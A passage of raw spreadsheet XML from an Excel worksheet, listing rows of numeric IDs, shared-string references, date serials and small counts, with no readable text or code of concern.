      <c r="F185" s="9" t="s">
        <v>2226</v>
      </c>
      <c r="G185" s="10">
        <v>39713.4375</v>
      </c>
      <c r="H185" s="9">
        <v>5744</v>
      </c>
      <c r="I185" s="9" t="s">
        <v>2227</v>
      </c>
      <c r="J185" s="10">
        <v>39710.958333333336</v>
      </c>
      <c r="K185" s="9" t="s">
        <v>992</v>
      </c>
      <c r="L185" s="7">
        <v>7</v>
      </c>
      <c r="M185" s="7">
        <v>5</v>
      </c>
      <c r="N185" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="186" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A186" s="3">
        <v>84616</v>
      </c>
      <c r="B186" s="3" t="s">
        <v>322</v>
      </c>
      <c r="C186" s="9" t="s">
        <v>2228</v>
      </c>
      <c r="D186" s="9" t="s">
        <v>2229</v>
      </c>
      <c r="E186" s="9">
        <v>1968</v>
      </c>
      <c r="F186" s="9" t="s">
        <v>1868</v>
      </c>
      <c r="G186" s="10">
        <v>41991.536111111112</v>
      </c>
      <c r="H186" s="9">
        <v>59087</v>
      </c>
      <c r="I186" s="9" t="s">
        <v>1737</v>
      </c>
      <c r="J186" s="10">
        <v>41991.05</v>
      </c>
      <c r="K186" s="3" t="s">
        <v>323</v>
      </c>
      <c r="L186" s="4">
        <v>4</v>
      </c>
      <c r="M186" s="4">
        <v>2</v>
      </c>
      <c r="N186" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O186" s="3" t="s">
        <v>699</v>
      </c>
      <c r="P186" s="3"/>
      <c r="Q186" s="3"/>
    </row>
    <row r="187" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A187" s="3">
        <v>84629</v>
      </c>
      <c r="B187" s="3" t="s">
        <v>342</v>
      </c>
      <c r="C187" s="9" t="s">
        <v>2230</v>
      </c>
      <c r="D187" s="9" t="s">
        <v>2231</v>
      </c>
      <c r="E187" s="9">
        <v>3</v>
      </c>
      <c r="F187" s="9" t="s">
        <v>2232</v>
      </c>
      <c r="G187" s="10">
        <v>40492.318749999999</v>
      </c>
      <c r="H187" s="9">
        <v>366797</v>
      </c>
      <c r="I187" s="9" t="s">
        <v>2233</v>
      </c>
      <c r="J187" s="10">
        <v>40492.289583333331</v>
      </c>
      <c r="K187" s="3" t="s">
        <v>343</v>
      </c>
      <c r="L187" s="4">
        <v>7</v>
      </c>
      <c r="M187" s="4">
        <v>5</v>
      </c>
      <c r="N187" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O187" s="3"/>
      <c r="P187" s="3"/>
      <c r="Q187" s="3"/>
    </row>
    <row r="188" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A188" s="3">
        <v>84826</v>
      </c>
      <c r="B188" s="3" t="s">
        <v>344</v>
      </c>
      <c r="C188" s="9" t="s">
        <v>2234</v>
      </c>
      <c r="D188" s="9" t="s">
        <v>2235</v>
      </c>
      <c r="E188" s="9">
        <v>16253</v>
      </c>
      <c r="F188" s="9" t="s">
        <v>2236</v>
      </c>
      <c r="G188" s="10">
        <v>39713.645833333336</v>
      </c>
      <c r="H188" s="9">
        <v>122</v>
      </c>
      <c r="I188" s="9" t="s">
        <v>1647</v>
      </c>
      <c r="J188" s="10">
        <v>39709.418055555558</v>
      </c>
      <c r="K188" s="3" t="s">
        <v>345</v>
      </c>
      <c r="L188" s="4">
        <v>3</v>
      </c>
      <c r="M188" s="4">
        <v>2</v>
      </c>
      <c r="N188" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O188" s="3"/>
      <c r="P188" s="3"/>
      <c r="Q188" s="3"/>
    </row>
    <row r="189" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A189" s="3">
        <v>84986</v>
      </c>
      <c r="B189" s="3" t="s">
        <v>346</v>
      </c>
      <c r="C189" s="9" t="s">
        <v>2237</v>
      </c>
      <c r="D189" s="9" t="s">
        <v>2238</v>
      </c>
      <c r="E189" s="9">
        <v>1968</v>
      </c>
      <c r="F189" s="9" t="s">
        <v>1868</v>
      </c>
      <c r="G189" s="10">
        <v>40391.779166666667</v>
      </c>
      <c r="H189" s="9">
        <v>112355</v>
      </c>
      <c r="I189" s="9" t="s">
        <v>2239</v>
      </c>
      <c r="J189" s="10">
        <v>40389.628472222219</v>
      </c>
      <c r="K189" s="3" t="s">
        <v>347</v>
      </c>
      <c r="L189" s="4">
        <v>7</v>
      </c>
      <c r="M189" s="4">
        <v>5</v>
      </c>
      <c r="N189" s="3" t="s">
        <v>696</v>
      </c>
      <c r="O189" s="3"/>
      <c r="P189" s="3"/>
      <c r="Q189" s="3"/>
    </row>
    <row r="190" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A190" s="3">
        <v>84987</v>
      </c>
      <c r="B190" s="3" t="s">
        <v>348</v>
      </c>
      <c r="C190" s="9" t="s">
        <v>2240</v>
      </c>
      <c r="D190" s="9" t="s">
        <v>2241</v>
      </c>
      <c r="E190" s="9">
        <v>12643</v>
      </c>
      <c r="F190" s="9" t="s">
        <v>2242</v>
      </c>
      <c r="G190" s="10">
        <v>41988.638194444444</v>
      </c>
      <c r="H190" s="9">
        <v>833066</v>
      </c>
      <c r="I190" s="9" t="s">
        <v>2243</v>
      </c>
      <c r="J190" s="10">
        <v>41955.851388888892</v>
      </c>
      <c r="K190" s="3" t="s">
        <v>349</v>
      </c>
      <c r="L190" s="4">
        <v>4</v>
      </c>
      <c r="M190" s="4">
        <v>2</v>
      </c>
      <c r="N190" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O190" s="3"/>
      <c r="P190" s="3"/>
      <c r="Q190" s="3"/>
    </row>
    <row r="191" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A191" s="3">
        <v>85206</v>
      </c>
      <c r="B191" s="3" t="s">
        <v>350</v>
      </c>
      <c r="C191" s="9" t="s">
        <v>2244</v>
      </c>
      <c r="D191" s="9" t="s">
        <v>2245</v>
      </c>
      <c r="E191" s="9">
        <v>429063</v>
      </c>
      <c r="F191" s="9" t="s">
        <v>2246</v>
      </c>
      <c r="G191" s="10">
        <v>41697.676388888889</v>
      </c>
      <c r="H191" s="9">
        <v>491245</v>
      </c>
      <c r="I191" s="9" t="s">
        <v>2247</v>
      </c>
      <c r="J191" s="10">
        <v>41697.676388888889</v>
      </c>
      <c r="K191" s="3" t="s">
        <v>351</v>
      </c>
      <c r="L191" s="4">
        <v>6</v>
      </c>
      <c r="M191" s="4">
        <v>4</v>
      </c>
      <c r="N191" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O191" s="3"/>
      <c r="P191" s="3"/>
      <c r="Q191" s="3"/>
    </row>
    <row r="192" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A192" s="3">
        <v>85377</v>
      </c>
      <c r="B192" s="3" t="s">
        <v>416</v>
      </c>
      <c r="C192" s="9" t="s">
        <v>2248</v>
      </c>
      <c r="D192" s="9" t="s">
        <v>2249</v>
      </c>
      <c r="E192" s="9">
        <v>2233</v>
      </c>
      <c r="F192" s="9" t="s">
        <v>2250</v>
      </c>
      <c r="G192" s="10">
        <v>40006.682638888888</v>
      </c>
      <c r="H192" s="9">
        <v>369</v>
      </c>
      <c r="I192" s="9" t="s">
        <v>2251</v>
      </c>
      <c r="J192" s="10">
        <v>39942.508333333331</v>
      </c>
      <c r="K192" s="3" t="s">
        <v>417</v>
      </c>
      <c r="L192" s="4">
        <v>3</v>
      </c>
      <c r="M192" s="4">
        <v>1</v>
      </c>
      <c r="N192" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O192" s="3"/>
      <c r="P192" s="3"/>
      <c r="Q192" s="3"/>
    </row>
    <row r="193" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A193" s="3">
        <v>86093</v>
      </c>
      <c r="B193" s="3" t="s">
        <v>418</v>
      </c>
      <c r="C193" s="9" t="s">
        <v>2252</v>
      </c>
      <c r="D193" s="9" t="s">
        <v>2253</v>
      </c>
      <c r="E193" s="9">
        <v>112310</v>
      </c>
      <c r="F193" s="9" t="s">
        <v>2254</v>
      </c>
      <c r="G193" s="10">
        <v>40125.645833333336</v>
      </c>
      <c r="H193" s="9">
        <v>112310</v>
      </c>
      <c r="I193" s="9" t="s">
        <v>2254</v>
      </c>
      <c r="J193" s="10">
        <v>40125.63958333333</v>
      </c>
      <c r="K193" s="3" t="s">
        <v>419</v>
      </c>
      <c r="L193" s="4">
        <v>7</v>
      </c>
      <c r="M193" s="4">
        <v>5</v>
      </c>
      <c r="N193" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O193" s="3"/>
      <c r="P193" s="3"/>
      <c r="Q193" s="3"/>
    </row>
    <row r="194" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A194" s="9">
        <v>86653</v>
      </c>
      <c r="B194" s="9" t="s">
        <v>993</v>
      </c>
      <c r="C194" s="9" t="s">
        <v>2255</v>
      </c>
      <c r="D194" s="9" t="s">
        <v>2256</v>
      </c>
      <c r="E194" s="9">
        <v>2821954</v>
      </c>
      <c r="F194" s="9" t="s">
        <v>2257</v>
      </c>
      <c r="G194" s="10">
        <v>42338.35</v>
      </c>
      <c r="H194" s="9">
        <v>1616697</v>
      </c>
      <c r="I194" s="9" t="s">
        <v>2258</v>
      </c>
      <c r="J194" s="10">
        <v>42338.336111111108</v>
      </c>
      <c r="K194" s="9" t="s">
        <v>994</v>
      </c>
      <c r="L194" s="7">
        <v>6</v>
      </c>
      <c r="M194" s="7">
        <v>4</v>
      </c>
      <c r="N194" s="9" t="s">
        <v>704</v>
      </c>
      <c r="O194" s="9" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="195" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A195" s="3">
        <v>87737</v>
      </c>
      <c r="B195" s="3" t="s">
        <v>420</v>
      </c>
      <c r="C195" s="9" t="s">
        <v>2259</v>
      </c>
      <c r="D195" s="9" t="s">
        <v>2260</v>
      </c>
      <c r="E195" s="9">
        <v>14514</v>
      </c>
      <c r="F195" s="9" t="s">
        <v>2261</v>
      </c>
      <c r="G195" s="10">
        <v>42291.35833333333</v>
      </c>
      <c r="H195" s="9">
        <v>3204023</v>
      </c>
      <c r="I195" s="9" t="s">
        <v>2262</v>
      </c>
      <c r="J195" s="10">
        <v>42290.708333333336</v>
      </c>
      <c r="K195" s="3" t="s">
        <v>421</v>
      </c>
      <c r="L195" s="4">
        <v>3</v>
      </c>
      <c r="M195" s="4">
        <v>1</v>
      </c>
      <c r="N195" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O195" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P195" s="3"/>
      <c r="Q195" s="3"/>
    </row>
    <row r="196" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A196" s="9">
        <v>87892</v>
      </c>
      <c r="B196" s="9" t="s">
        <v>995</v>
      </c>
      <c r="C196" s="9" t="s">
        <v>2263</v>
      </c>
      <c r="D196" s="9" t="s">
        <v>2264</v>
      </c>
      <c r="E196" s="9">
        <v>13564</v>
      </c>
      <c r="F196" s="9" t="s">
        <v>2265</v>
      </c>
      <c r="G196" s="10">
        <v>43223.82708333333</v>
      </c>
      <c r="H196" s="9">
        <v>3092540</v>
      </c>
      <c r="I196" s="9" t="s">
        <v>2266</v>
      </c>
      <c r="J196" s="10">
        <v>43223.23333333333</v>
      </c>
      <c r="K196" s="9" t="s">
        <v>996</v>
      </c>
      <c r="L196" s="7">
        <v>3</v>
      </c>
      <c r="M196" s="7">
        <v>1</v>
      </c>
      <c r="N196" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="197" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A197" s="9">
        <v>88211</v>
      </c>
      <c r="B197" s="9" t="s">
        <v>997</v>
      </c>
      <c r="C197" s="9" t="s">
        <v>2267</v>
      </c>
      <c r="D197" s="9" t="s">
        <v>2268</v>
      </c>
      <c r="E197" s="9">
        <v>1765</v>
      </c>
      <c r="F197" s="9" t="s">
        <v>2269</v>
      </c>
      <c r="G197" s="10">
        <v>41315.180555555555</v>
      </c>
      <c r="H197" s="9">
        <v>918414</v>
      </c>
      <c r="I197" s="9" t="s">
        <v>2270</v>
      </c>
      <c r="J197" s="10">
        <v>41314.089583333334</v>
      </c>
      <c r="K197" s="9" t="s">
        <v>998</v>
      </c>
      <c r="L197" s="7">
        <v>4</v>
      </c>
      <c r="M197" s="7">
        <v>2</v>
      </c>
      <c r="N197" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="198" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A198" s="3">
        <v>88502</v>
      </c>
      <c r="B198" s="3" t="s">
        <v>422</v>
      </c>
      <c r="C198" s="9" t="s">
        <v>2271</v>
      </c>
      <c r="D198" s="9" t="s">
        <v>2272</v>
      </c>
      <c r="E198" s="9">
        <v>5640</v>
      </c>
      <c r="F198" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="G198" s="10">
        <v>39890.776388888888</v>
      </c>
      <c r="H198" s="9">
        <v>16587</v>
      </c>
      <c r="I198" s="9" t="s">
        <v>1733</v>
      </c>
      <c r="J198" s="10">
        <v>39890.776388888888</v>
      </c>
      <c r="K198" s="3" t="s">
        <v>423</v>
      </c>
      <c r="L198" s="4">
        <v>3</v>
      </c>
      <c r="M198" s="4">
        <v>1</v>
      </c>
      <c r="N198" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O198" s="3"/>
      <c r="P198" s="3"/>
      <c r="Q198" s="3"/>
    </row>
    <row r="199" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A199" s="3">
        <v>88781</v>
      </c>
      <c r="B199" s="3" t="s">
        <v>424</v>
      </c>
      <c r="C199" s="9" t="s">
        <v>2273</v>
      </c>
      <c r="D199" s="9" t="s">
        <v>2274</v>
      </c>
      <c r="E199" s="9">
        <v>10718</v>
      </c>
      <c r="F199" s="9" t="s">
        <v>2275</v>
      </c>
      <c r="G199" s="10">
        <v>39710.886111111111</v>
      </c>
      <c r="H199" s="9">
        <v>10718</v>
      </c>
      <c r="I199" s="9" t="s">
        <v>2275</v>
      </c>
      <c r="J199" s="10">
        <v>39710.881944444445</v>
      </c>
      <c r="K199" s="3" t="s">
        <v>425</v>
      </c>
      <c r="L199" s="4">
        <v>3</v>
      </c>
      <c r="M199" s="4">
        <v>1</v>
      </c>
      <c r="N199" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O199" s="3"/>
      <c r="P199" s="3"/>
      <c r="Q199" s="3"/>
    </row>
    <row r="200" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A200" s="3">
        <v>88998</v>
      </c>
      <c r="B200" s="3" t="s">
        <v>448</v>
      </c>
      <c r="C200" s="9" t="s">
        <v>2276</v>
      </c>
      <c r="D200" s="9" t="s">
        <v>2277</v>
      </c>
      <c r="E200" s="9">
        <v>495455</v>
      </c>
      <c r="F200" s="9" t="s">
        <v>2278</v>
      </c>
      <c r="G200" s="10">
        <v>42668.197222222225</v>
      </c>
      <c r="H200" s="9">
        <v>495455</v>
      </c>
      <c r="I200" s="9" t="s">
        <v>2278</v>
      </c>
      <c r="J200" s="10">
        <v>42668.191666666666</v>
      </c>
      <c r="K200" s="3" t="s">
        <v>449</v>
      </c>
      <c r="L200" s="4">
        <v>3</v>
      </c>
      <c r="M200" s="4">
        <v>1</v>
      </c>
      <c r="N200" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O200" s="3"/>
      <c r="P200" s="3"/>
      <c r="Q200" s="3"/>
    </row>
    <row r="201" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A201" s="9">
        <v>89051</v>
      </c>
      <c r="B201" s="9" t="s">
        <v>999</v>
      </c>
      <c r="C201" s="9" t="s">
        <v>2279</v>
      </c>
      <c r="D201" s="9" t="s">
        <v>2280</v>
      </c>
      <c r="E201" s="9">
        <v>9021</v>
      </c>
      <c r="F201" s="9" t="s">
        <v>2281</v>
      </c>
      <c r="G201" s="10">
        <v>42901.32708333333</v>
      </c>
      <c r="H201" s="9">
        <v>1055241</v>
      </c>
      <c r="I201" s="9" t="s">
        <v>2282</v>
      </c>
      <c r="J201" s="10">
        <v>42895.419444444444</v>
      </c>
      <c r="K201" s="9" t="s">
        <v>1000</v>
      </c>
      <c r="L201" s="7">
        <v>4</v>
      </c>
      <c r="M201" s="7">
        <v>2</v>
      </c>
      <c r="N201" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="202" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A202" s="3">
        <v>89428</v>
      </c>
      <c r="B202" s="3" t="s">
        <v>450</v>
      </c>
      <c r="C202" s="9" t="s">
        <v>2283</v>
      </c>
      <c r="D202" s="9" t="s">
        <v>2284</v>
      </c>
      <c r="E202" s="9">
        <v>17034</v>
      </c>
      <c r="F202" s="9" t="s">
        <v>2128</v>
      </c>
      <c r="G202" s="10">
        <v>40909.582638888889</v>
      </c>
      <c r="H202" s="9">
        <v>1042</v>
      </c>
      <c r="I202" s="9" t="s">
        <v>2285</v>
      </c>
      <c r="J202" s="10">
        <v>40081.78125</v>
      </c>
      <c r="K202" s="3" t="s">
        <v>451</v>
      </c>
      <c r="L202" s="4">
        <v>3</v>
      </c>
      <c r="M202" s="4">
        <v>1</v>
      </c>
      <c r="N202" s="3"/>
      <c r="O202" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P202" s="3"/>
      <c r="Q202" s="3"/>
    </row>
    <row r="203" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A203" s="3">
        <v>89470</v>
      </c>
      <c r="B203" s="3" t="s">
        <v>490</v>
      </c>
      <c r="C203" s="9" t="s">
        <v>2286</v>
      </c>
      <c r="D203" s="9" t="s">
        <v>2287</v>
      </c>
      <c r="E203" s="9">
        <v>17034</v>
      </c>
      <c r="F203" s="9" t="s">
        <v>2128</v>
      </c>
      <c r="G203" s="10">
        <v>40657.404861111114</v>
      </c>
      <c r="H203" s="9">
        <v>55408</v>
      </c>
      <c r="I203" s="9" t="s">
        <v>2288</v>
      </c>
      <c r="J203" s="10">
        <v>40653.191666666666</v>
      </c>
      <c r="K203" s="3" t="s">
        <v>491</v>
      </c>
      <c r="L203" s="4">
        <v>3</v>
      </c>
      <c r="M203" s="4">
        <v>1</v>
      </c>
      <c r="N203" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O203" s="3"/>
      <c r="P203" s="3"/>
      <c r="Q203" s="3"/>
    </row>
    <row r="204" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A204" s="9">
        <v>89791</v>
      </c>
      <c r="B204" s="9" t="s">
        <v>1001</v>
      </c>
      <c r="C204" s="9" t="s">
        <v>2289</v>
      </c>
      <c r="D204" s="9" t="s">
        <v>2290</v>
      </c>
      <c r="E204" s="9">
        <v>3146</v>
      </c>
      <c r="F204" s="9" t="s">
        <v>2291</v>
      </c>
      <c r="G204" s="10">
        <v>39709.295138888891</v>
      </c>
      <c r="H204" s="9">
        <v>3146</v>
      </c>
      <c r="I204" s="9" t="s">
        <v>2291</v>
      </c>
      <c r="J204" s="10">
        <v>39709.200694444444</v>
      </c>
      <c r="K204" s="9" t="s">
        <v>1002</v>
      </c>
      <c r="L204" s="7">
        <v>5</v>
      </c>
      <c r="M204" s="7">
        <v>3</v>
      </c>
      <c r="N204" s="9" t="s">
        <v>716</v>
      </c>
      <c r="O204" s="9" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="205" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A205" s="3">
        <v>90070</v>
      </c>
      <c r="B205" s="3" t="s">
        <v>492</v>
      </c>
      <c r="C205" s="9" t="s">
        <v>2292</v>
      </c>
      <c r="D205" s="9" t="s">
        <v>2293</v>
      </c>
      <c r="E205" s="9">
        <v>14484</v>
      </c>
      <c r="F205" s="9" t="s">
        <v>2294</v>
      </c>
      <c r="G205" s="10">
        <v>40591.773611111108</v>
      </c>
      <c r="H205" s="9">
        <v>14484</v>
      </c>
      <c r="I205" s="9" t="s">
        <v>2294</v>
      </c>
      <c r="J205" s="10">
        <v>40591.772916666669</v>
      </c>
      <c r="K205" s="3" t="s">
        <v>493</v>
      </c>
      <c r="L205" s="4">
        <v>4</v>
      </c>
      <c r="M205" s="4">
        <v>2</v>
      </c>
      <c r="N205" s="3"/>
      <c r="O205" s="3"/>
      <c r="P205" s="3"/>
      <c r="Q205" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="206" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A206" s="9">
        <v>90325</v>
      </c>
      <c r="B206" s="9" t="s">
        <v>1003</v>
      </c>
      <c r="C206" s="9" t="s">
        <v>2295</v>
      </c>
      <c r="D206" s="9" t="s">
        <v>2296</v>
      </c>
      <c r="E206" s="9">
        <v>17258</v>
      </c>
      <c r="F206" s="9" t="s">
        <v>2297</v>
      </c>
      <c r="G206" s="10">
        <v>39709.317361111112</v>
      </c>
      <c r="H206" s="9">
        <v>17258</v>
      </c>
      <c r="I206" s="9" t="s">
        <v>2297</v>
      </c>
      <c r="J206" s="10">
        <v>39709.234722222223</v>
      </c>
      <c r="K206" s="9" t="s">
        <v>1004</v>
      </c>
      <c r="L206" s="7">
        <v>2</v>
      </c>
      <c r="M206" s="7">
        <v>1</v>
      </c>
      <c r="Q206" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="207" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A207" s="3">
        <v>91054</v>
      </c>
      <c r="B207" s="3" t="s">
        <v>494</v>
      </c>
      <c r="C207" s="9" t="s">
        <v>2298</v>
      </c>
      <c r="D207" s="9" t="s">
        <v>2299</v>
      </c>
      <c r="E207" s="9">
        <v>560648</v>
      </c>
      <c r="F207" s="9" t="s">
        <v>1634</v>
      </c>
      <c r="G207" s="10">
        <v>40947.567361111112</v>
      </c>
      <c r="H207" s="9">
        <v>560648</v>
      </c>
      <c r="I207" s="9" t="s">
        <v>1634</v>
      </c>
      <c r="J207" s="10">
        <v>40947.56527777778</v>
      </c>
      <c r="K207" s="3" t="s">
        <v>495</v>
      </c>
      <c r="L207" s="4">
        <v>4</v>
      </c>
      <c r="M207" s="4">
        <v>2</v>
      </c>
      <c r="N207" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O207" s="3"/>
      <c r="P207" s="3"/>
      <c r="Q207" s="3"/>
    </row>
    <row r="208" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A208" s="9">
        <v>91110</v>
      </c>
      <c r="B208" s="9" t="s">
        <v>1005</v>
      </c>
      <c r="C208" s="9" t="s">
        <v>2300</v>
      </c>
      <c r="D208" s="9" t="s">
        <v>2301</v>
      </c>
      <c r="E208" s="9">
        <v>6899</v>
      </c>
      <c r="F208" s="9" t="s">
        <v>2302</v>
      </c>
      <c r="G208" s="10">
        <v>39737.011805555558</v>
      </c>
      <c r="H208" s="9">
        <v>4193</v>
      </c>
      <c r="I208" s="9" t="s">
        <v>2303</v>
      </c>
      <c r="J208" s="10">
        <v>39736.993750000001</v>
      </c>
      <c r="K208" s="9" t="s">
        <v>1006</v>
      </c>
      <c r="L208" s="7">
        <v>6</v>
      </c>
      <c r="M208" s="7">
        <v>4</v>
      </c>
      <c r="N208" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="209" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A209" s="9">
        <v>91362</v>
      </c>
      <c r="B209" s="9" t="s">
        <v>1007</v>
      </c>
      <c r="C209" s="9" t="s">
        <v>2304</v>
      </c>
      <c r="D209" s="9" t="s">
        <v>2305</v>
      </c>
      <c r="E209" s="9">
        <v>4685</v>
      </c>
      <c r="F209" s="9" t="s">
        <v>2306</v>
      </c>
      <c r="G209" s="10">
        <v>40906.581250000003</v>
      </c>
      <c r="H209" s="9">
        <v>4918</v>
      </c>
      <c r="I209" s="9" t="s">
        <v>2307</v>
      </c>
      <c r="J209" s="10">
        <v>40904.729861111111</v>
      </c>
      <c r="K209" s="9" t="s">
        <v>1008</v>
      </c>
      <c r="L209" s="7">
        <v>4</v>
      </c>
      <c r="M209" s="7">
        <v>2</v>
      </c>
      <c r="O209" s="9" t="s">
        <v>705</v>
      </c>
      <c r="Q209" s="9" t="s">
        <v>978</v>
      </c>
    </row>
    <row r="210" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A210" s="3">
        <v>91795</v>
      </c>
      <c r="B210" s="3" t="s">
        <v>496</v>
      </c>
      <c r="C210" s="9" t="s">
        <v>2308</v>
      </c>
      <c r="D210" s="9" t="s">
        <v>2309</v>
      </c>
      <c r="E210" s="9">
        <v>9410</v>
      </c>
      <c r="F210" s="9" t="s">
        <v>2310</v>
      </c>
      <c r="G210" s="10">
        <v>42636.118055555555</v>
      </c>
      <c r="H210" s="9">
        <v>509706</v>
      </c>
      <c r="I210" s="9" t="s">
        <v>2311</v>
      </c>
      <c r="J210" s="10">
        <v>42634.754166666666</v>
      </c>
      <c r="K210" s="3" t="s">
        <v>497</v>
      </c>
      <c r="L210" s="4">
        <v>12</v>
      </c>
      <c r="M210" s="4">
        <v>10</v>
      </c>
      <c r="N210" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O210" s="3"/>
      <c r="P210" s="3"/>
      <c r="Q210" s="3"/>
    </row>
    <row r="211" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A211" s="3">
        <v>92071</v>
      </c>
      <c r="B211" s="3" t="s">
        <v>562</v>
      </c>
      <c r="C211" s="9" t="s">
        <v>2312</v>
      </c>
      <c r="D211" s="9" t="s">
        <v>2313</v>
      </c>
      <c r="E211" s="9">
        <v>227</v>
      </c>
      <c r="F211" s="9" t="s">
        <v>2314</v>
      </c>
      <c r="G211" s="10">
        <v>39709.553472222222</v>
      </c>
      <c r="H211" s="9">
        <v>227</v>
      </c>
      <c r="I211" s="9" t="s">
        <v>2314</v>
      </c>
      <c r="J211" s="10">
        <v>39709.553472222222</v>
      </c>
      <c r="K211" s="3" t="s">
        <v>563</v>
      </c>
      <c r="L211" s="4">
        <v>4</v>
      </c>
      <c r="M211" s="4">
        <v>2</v>
      </c>
      <c r="N211" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O211" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P211" s="3"/>
      <c r="Q211" s="3"/>
    </row>
    <row r="212" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A212" s="9">
        <v>93539</v>
      </c>
      <c r="B212" s="9" t="s">
        <v>1009</v>
      </c>
      <c r="C212" s="9" t="s">
        <v>2315</v>
      </c>
      <c r="D212" s="9" t="s">
        <v>2316</v>
      </c>
      <c r="E212" s="9">
        <v>1782</v>
      </c>
      <c r="F212" s="9" t="s">
        <v>1973</v>
      </c>
      <c r="G212" s="10">
        <v>41189.588888888888</v>
      </c>
      <c r="H212" s="9">
        <v>-1</v>
      </c>
      <c r="I212" s="9" t="s">
        <v>2025</v>
      </c>
      <c r="J212" s="10">
        <v>41189.561805555553</v>
      </c>
      <c r="K212" s="9" t="s">
        <v>1010</v>
      </c>
      <c r="L212" s="7">
        <v>3</v>
      </c>
      <c r="M212" s="7">
        <v>1</v>
      </c>
      <c r="N212" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="213" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A213" s="13">
        <v>93664</v>
      </c>
      <c r="B213" s="13" t="s">
        <v>1011</v>
      </c>
      <c r="C213" s="9" t="s">
        <v>2317</v>
      </c>
      <c r="D213" s="9" t="s">
        <v>2317</v>
      </c>
      <c r="E213" s="9">
        <v>419</v>
      </c>
      <c r="F213" s="9" t="s">
        <v>812</v>
      </c>
      <c r="G213" s="10">
        <v>39845.175000000003</v>
      </c>
      <c r="H213" s="9">
        <v>5640</v>
      </c>
      <c r="I213" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J213" s="10">
        <v>39842.82708333333</v>
      </c>
      <c r="K213" s="13" t="s">
        <v>1012</v>
      </c>
      <c r="L213" s="7">
        <v>5</v>
      </c>
      <c r="M213" s="7">
        <v>3</v>
      </c>
      <c r="N213" s="13" t="s">
        <v>703</v>
      </c>
      <c r="O213" s="13"/>
      <c r="P213" s="13"/>
      <c r="Q213" s="13"/>
    </row>
    <row r="214" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A214" s="3">
        <v>94049</v>
      </c>
      <c r="B214" s="3" t="s">
        <v>564</v>
      </c>
      <c r="C214" s="9" t="s">
        <v>2318</v>
      </c>
      <c r="D214" s="9" t="s">
        <v>2319</v>
      </c>
      <c r="E214" s="9">
        <v>8427</v>
      </c>
      <c r="F214" s="9" t="s">
        <v>2320</v>
      </c>
      <c r="G214" s="10">
        <v>41222.718055555553</v>
      </c>
      <c r="H214" s="9">
        <v>295264</v>
      </c>
      <c r="I214" s="9" t="s">
        <v>2321</v>
      </c>
      <c r="J214" s="10">
        <v>41219.186805555553</v>
      </c>
      <c r="K214" s="3" t="s">
        <v>565</v>
      </c>
      <c r="L214" s="4">
        <v>3</v>
      </c>
      <c r="M214" s="4">
        <v>1</v>
      </c>
      <c r="N214" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O214" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P214" s="3"/>
      <c r="Q214" s="3"/>
    </row>
    <row r="215" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A215" s="9">
        <v>94591</v>
      </c>
      <c r="B215" s="9" t="s">
        <v>1013</v>
      </c>
      <c r="C215" s="9" t="s">
        <v>2322</v>
      </c>
      <c r="D215" s="9" t="s">
        <v>2323</v>
      </c>
      <c r="E215" s="9">
        <v>4482</v>
      </c>
      <c r="F215" s="9" t="s">
        <v>2324</v>
      </c>
